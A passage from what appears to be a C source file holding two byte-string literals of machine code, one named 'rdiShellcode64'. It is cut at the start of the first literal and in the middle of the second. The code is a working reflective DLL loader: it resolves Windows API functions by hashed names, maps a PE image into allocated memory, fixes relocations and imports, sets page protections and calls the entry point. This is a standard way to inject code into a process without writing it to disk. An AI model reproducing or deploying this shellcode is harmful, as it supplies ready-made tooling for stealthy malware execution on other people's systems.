0\x00\x39\xAC\x24\xBC\x00\x00\x00\x0F\x84\xAB\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\x9C\x06\x00\x00\x8B\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\x84\x06\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\x75\x06\x00\x00\x8B\x46\x38\xA8\x01\x0F\x85\x6A\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x28\x03\xCE\x83\x79\x04\x00\x8B\x39\x74\x03\x8B\x41\x04\x03\xC7\x3B\xC3\x0F\x46\xC3\x83\xC1\x28\x8B\xD8\x8B\x46\x38\x83\xEA\x01\x75\xE1\x8B\xBC\x24\x28\x01\x00\x00\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2\x3B\xE8\x0F\x85\x04\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24\x48\x8B\xD8\x89\x5C\x24\x30\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54\x24\x48\x8B\xD8\x89\x44\x24\x30\xF6\x84\x24\x3C\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24\x18\x33\xC0\x89\x6C\x24\x24\x0F\xB7\x75\x14\x83\xC6\x28\x66\x3B\x45\x06\x73\x3E\x03\xF5\x83\x64\x24\x20\x00\x83\x3E\x00\x76\x22\x8B\x6C\x24\x20\x8B\x46\x04\x8D\x14\x2B\x8B\x4E\xFC\x03\xC5\x45\x8A\x04\x38\x88\x04\x0A\x3B\x2E\x72\xEA\x8B\x6C\x24\x24\x8B\x4C\x24\x18\x0F\xB7\x45\x06\x41\x83\xC6\x28\x89\x4C\x24\x18\x3B\xC8\x72\xC4\x8B\xC3\x2B\x45\x34\x89\x44\x24\x20\x0F\x84\xB8\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xAB\x00\x00\x00\x8B\xB5\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\x9A\x00\x00\x00\x8B\xE8\x8D\x7E\x08\xEB\x74\x0F\xB7\x0F\x66\x8B\xC1\x0F\xB7\xD1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x20\x8B\x16\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x20\x8D\x04\x1A\x8B\x0C\x08\x8D\x04\x1A\x8B\x54\x24\x20\x03\xCD\x89\x0C\x10\xEB\x3C\x66\x83\xF8\x03\x75\x0F\x8B\x06\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x2C\x02\xEB\x27\x33\xC9\x41\x66\x3B\xC1\x75\x07\x8B\xC5\xC1\xE8\x10\xEB\x0B\x6A\x02\x59\x66\x3B\xC1\x75\x10\x0F\xB7\xC5\x8B\x0E\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x04\x0A\x6A\x02\x58\x03\xF8\x8B\x46\x04\x03\xC6\x3B\xF8\x75\x83\x83\x3F\x00\x8B\xF7\x0F\x85\x73\xFF\xFF\xFF\x8B\x6C\x24\x24\x8B\xBC\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xEF\x01\x00\x00\x8B\xB5\x80\x00\x00\x00\x33\xC0\x89\x84\x24\xAC\x00\x00\x00\x8D\x0C\x1E\x89\x4C\x24\x20\x83\xC1\x0C\x39\x01\x74\x10\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x84\x24\xAC\x00\x00\x00\xF6\x84\x24\x3C\x01\x00\x00\x04\x8B\xD6\x0F\x84\xCF\x00\x00\x00\x33\xC9\x41\x3B\xC1\x0F\x86\xC4\x00\x00\x00\x8B\x8C\x24\x3C\x01\x00\x00\x8D\x50\xFF\x83\xA4\x24\xC0\x00\x00\x00\x00\x89\x54\x24\x28\x8B\xD6\xC1\xE9\x10\x8D\x70\xFF\x89\x4C\x24\x18\x85\xF6\x0F\x84\xA2\x00\x00\x00\x8B\x74\x24\x20\x8B\xDE\x8B\xAC\x24\xC0\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x84\x24\xAC\x00\x00\x00\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01\x00\x00\x83\xC3\x14\x8B\x74\x24\x20\x3B\x6C\x24\x28\x72\x87\x8B\x6C\x24\x24\x8B\x5C\x24\x30\x8B\x4C\x24\x18\x8B\x95\x80\x00\x00\x00\xEB\x08\x8B\x4C\x24\x28\x89\x4C\x24\x18\x8D\x3C\x1A\x8B\x57\x0C\x89\x7C\x24\x30\x85\xD2\x0F\x84\xC9\x00\x00\x00\x8B\xC1\x23\x84\x24\x3C\x01\x00\x00\x83\xE0\x04\x89\x84\x24\xC0\x00\x00\x00\x8D\x04\x1A\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB\x8B\x0E\x85\xC9\x74\x5A\x8B\x7C\x24\x34\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB\x30\x83\xC1\x02\x33\xC0\x03\xCB\x89\x4C\x24\x28\x38\x01\x74\x0B\x40\x41\x80\x39\x00\x75\xF9\x8B\x4C\x24\x28\x55\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x4C\x24\x1C\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xAE\x8B\x7C\x24\x30\x83\xBC\x24\xC0\x00\x00\x00\x00\x74\x1C\x33\xC0\x40\x39\x84\x24\xAC\x00\x00\x00\x76\x10\x69\x44\x24\x18\xE8\x03\x00\x00\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\x57\x20\x83\xC7\x14\x89\x7C\x24\x30\x85\xD2\x0F\x85\x4E\xFF\xFF\xFF\x8B\x6C\x24\x24\x83\xBD\xE4\x00\x00\x00\x00\x6A\x20\x5A\x0F\x84\xAF\x00\x00\x00\x8B\x85\xE0\x00\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x18\x8B\x00\x85\xC0\x0F\x84\x96\x00\x00\x00\x8B\x6C\x24\x18\x03\xC3\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x34\x8B\x17\x85\xD2\x79\x09\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x28\x38\x02\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x28\x56\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x54\x24\x1C\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x18\x6A\x20\x5A\x03\xEA\x89\x6C\x24\x18\x8B\x45\x00\x85\xC0\x0F\x85\x72\xFF\xFF\xFF\x8B\x6C\x24\x24\x0F\xB7\x75\x14\x33\xC0\x83\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\x81\x00\x00\x00\x03\xF5\x83\x3E\x00\x74\x6B\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x40\xF7\xC1\x00\x00\x00\x20\x75\x18\x85\xC0\x75\x0D\x6A\x08\x58\x6A\x01\x85\xC9\x59\x0F\x49\xC1\xEB\x1D\x6A\x04\x58\x6A\x02\xEB\xF1\x85\xC0\x75\x0A\x6A\x10\xB8\x80\x00\x00\x00\x5A\xEB\x03\x6A\x40\x58\x85\xC9\x0F\x49\xC2\x89\x44\x24\x2C\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89\x44\x24\x2C\x8D\x4C\x24\x2C\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC8\x00\x00\x00\x0F\xB7\x45\x06\x47\x83\xC6\x28\x6A\x20\x5A\x3B\xF8\x72\x81\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC8\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x24\x33\xC0\x40\x50\x50\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xC3\x00\x00\x00\x83\x7D\x7C\x00\x0F\x84\xB9\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84\xA9\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x9F\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB\x83\x64\x24\x34\x00\x03\xCB\x85\xED\x0F\x84\x88\x00\x00\x00\x8B\x37\x6A\x00\x58\x89\x44\x24\x18\x03\xF3\x74\x7B\x8A\x06\x84\xC0\x74\x2B\x8B\x6C\x24\x18\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x18\x8B\x44\x24\x18\x8B\x6A\x18\x39\x84\x24\x2C\x01\x00\x00\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x34\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24\x34\x3B\xC5\x72\xAF\xEB\x35\x0F\xB7\x09\x8B\x42\x1C\x8D\x04\x88\x8B\x04\x18\x03\xC3\xF6\x84\x24\x3C\x01\x00\x00\x08\x74\x0B\x6A\x04\xFF\xB4\x24\x3C\x01\x00\x00\xEB\x0E\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4\x24\x34\x01\x00\x00\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB";
110 | LPSTR rdiShellcode64 = "\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF\xC7\x45\xD0\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D\xC8\x44\x8B\xEA\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C\x89\x7D\x00\x4C\x89\x7D\xE8\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x24\xC7\x45\xD4\x72\x00\x6E\x00\xC7\x45\xD8\x65\x00\x6C\x00\xC7\x45\xDC\x33\x00\x32\x00\xC7\x45\xE0\x2E\x00\x64\x00\xC7\x45\xE4\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x64\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x48\x8B\xD8\xE8\x57\x08\x00\x00\x4C\x8B\xE0\x48\x89\x45\xF0\x48\x8D\x45\xD0\xC7\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xC8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x00\xC7\x44\x24\x20\x0E\x00\x0E\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\xC7\x44\x24\x20\x15\x00\x15\x00\x48\x8B\x4C\x24\x38\x48\x8D\x45\xA8\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x08\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x10\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xE8\xC7\x44\x24\x20\x05\x00\x05\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x18\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xF8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x4C\x39\x7D\xC8\x0F\x84\x03\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\xF9\x06\x00\x00\x4C\x39\x7D\xE8\x0F\x84\xEF\x06\x00\x00\x4C\x39\x7D\x08\x0F\x84\xE5\x06\x00\x00\x4C\x8B\x4D\x10\x4D\x85\xC9\x0F\x84\xD8\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50\x45\x00\x00\x0F\x85\xC5\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xB6\x06\x00\x00\x44\x8B\x47\x38\x45\x8D\x5F\x01\x45\x84\xC3\x0F\x85\xA5\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x29\x44\x0F\xB7\x57\x06\x48\x03\xCF\x8B\x41\x04\x8B\x11\x85\xC0\x75\x06\x41\x8D\x04\x10\xEB\x02\x03\xC2\x3B\xC3\x0F\x46\xC3\x48\x83\xC1\x28\x8B\xD8\x4D\x2B\xD3\x75\xDF\x48\x8D\x4D\x38\x41\xFF\xD1\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x32\x06\x00\x00\x48\x8B\x4F\x30\x41\xB9\x04\x00\x00\x00\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8\x48\x85\xC0\x75\x15\x44\x8D\x48\x04\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B\xD8\x41\xBB\x01\x00\x00\x00\x44\x84\x9D\xD8\x00\x00\x00\x74\x1D\x8B\x46\x3C\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39\xBF\x94\x00\x00\x00\x0F\x84\x9B\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x8B\x85\xD8\x00\x00\x00\x45\x8B\xE7\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x8E\x00\x00\x00\x45\x3B\xEB\x0F\x86\x85\x00\x00\x00\x44\x8B\xA5\xD8\x00\x00\x00\x45\x8D\x5D\xFF\x41\xC1\xEC\x10\x45\x8B\xD7\x45\x85\xDB\x74\x6E\x4D\x8B\xC8\x41\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xBC\x00\x00\x00\x8B\x7D\xC0\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x65\x48\x8B\x7D\xF0\x48\x85\xC9\x79\x08\x45\x0F\xB7\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x28\x45\x33\xC0\x48\x8D\x54\x24\x20\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4D\x8B\xCF\x49\x8B\xCA\xFF\xD7\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA2\x8B\x7D\xC0\x45\x33\xFF\x45\x85\xE4\x74\x14\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xE8\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x4B\xFF\xFF\xFF\x48\x8B\x7D\x30\x44\x8B\xAD\xB8\x00\x00\x00\x4C\x8B\x65\xF0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xB9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49\x83\xC7\x04\x4C\x03\xFB\x41\x8B\x07\x85\xC0\x0F\x84\x9D\x00\x00\x00\x41\xBD\x20\x00\x00\x00\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C\x48\x03\xF3\x4C\x03\xF3\x48\x83\x3E\x00\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7\xC2\x33\xD2\xEB\x33\x4C\x8D\x43\x02\x33\xC0\x4C\x03\xC2\x41\x38\x00\x74\x0E\x49\x8B\xD0\x48\xFF\xC2\x48\xFF\xC0\x80\x3A\x00\x75\xF5\x4C\x89\x44\x24\x28\x48\x8D\x54\x24\x20\x45\x33\xC0\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4C\x8B\xCE\x41\xFF\xD4\x48\x83\xC6\x08\x49\x83\xC6\x08\x48\x83\x3E\x00\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x4D\x03\xFD\x41\x8B\x07\x85\xC0\x0F\x85\x70\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\xA4\x00\x00\x00\x48\x03\xF7\x45\x8D\x6C\x24\x1F\x44\x39\x3E\x74\x7C\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x40\x0F\xBA\xE0\x1D\x72\x22\x85\xC9\x75\x0C\x85\xC0\x44\x8D\x41\x08\x45\x0F\x49\xC4\xEB\x33\x41\xB8\x04\x00\x00\x00\x85\xC0\x41\x8D\x40\xFE\x44\x0F\x49\xC0\xEB\x21\x85\xC9\x75\x11\xB9\x10\x00\x00\x00\x85\xC0\x44\x8D\x41\x70\x44\x0F\x49\xC1\xEB\x0C\x85\xC0\x41\xB8\x40\x00\x00\x00\x45\x0F\x49\xC5\x44\x89\x44\x24\x30\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44\x24\x30\x8B\x4E\xFC\x4C\x8D\x4C\x24\x30\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\x6B\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x45\x85\xED\x0F\x84\xBB\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\xAE\x00\x00\x00\x8B\x8F\x88\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x0F\x84\x98\x00\x00\x00\x44\x39\x79\x14\x0F\x84\x8E\x00\x00\x00\x44\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x79\x45\x8B\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x6E\x41\x8A\x00\x84\xC0\x74\x1E\x4D\x03\xC4\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x41\x8A\x00\x84\xC0\x75\xEC\x45\x3B\xEA\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x39\xEB\xBE\x8B\x41\x1C\x0F\xB7\x0